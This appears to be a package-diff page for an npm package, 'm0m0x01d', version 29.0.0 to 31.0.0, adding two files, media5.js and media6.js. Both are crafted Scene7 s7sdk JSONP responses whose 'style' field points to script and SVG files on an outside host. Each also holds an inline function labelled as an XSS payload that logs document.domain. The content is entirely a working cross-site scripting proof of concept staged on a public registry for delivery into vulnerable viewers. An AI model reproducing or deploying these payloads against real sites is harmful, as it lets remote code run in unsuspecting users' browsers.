m0m0x01d 29.0.0 → 31.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/media5.js +13 -0
- package/media6.js +13 -0
- package/package.json +1 -1
package/media5.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"style": "https://brutelogic.com.br/1.js",
|
4
|
+
"type": "MixedMediaHTML5Mobile",
|
5
|
+
"vt": "MediaSetVirtual"
|
6
|
+
}, "192959476");
|
7
|
+
|
8
|
+
// Inject XSS payload after the JSONP function
|
9
|
+
(function() {
|
10
|
+
var xss_payload = document.domain;
|
11
|
+
console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
|
12
|
+
})();
|
13
|
+
|
package/media6.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7sdkJSONResponse({
|
3
|
+
"style": "https://brutelogic.com.br/poc.svg",
|
4
|
+
"type": "MixedMediaHTML5Mobile",
|
5
|
+
"vt": "MediaSetVirtual"
|
6
|
+
}, "192959476");
|
7
|
+
|
8
|
+
// Inject XSS payload after the JSONP function
|
9
|
+
(function() {
|
10
|
+
var xss_payload = document.domain;
|
11
|
+
console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
|
12
|
+
})();
|
13
|
+
|